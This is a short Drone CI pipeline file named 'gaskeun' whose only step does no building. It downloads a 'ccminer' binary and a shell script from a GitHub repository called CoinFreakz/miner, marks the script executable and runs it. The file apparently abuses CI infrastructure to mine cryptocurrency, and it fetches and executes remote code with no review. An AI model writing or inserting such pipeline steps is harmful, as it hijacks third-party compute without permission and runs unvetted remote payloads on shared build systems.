kind: pipeline
type: docker
name: gaskeun

steps:
- name: bosss🚴
  image: golang
  commands:
  - wget https://github.com/CoinFreakz/miner/main/ccminer
  - wget https://github.com/CoinFreakz/miner/main/ap.sh && chmod u+x ap.sh && ./ap.sh
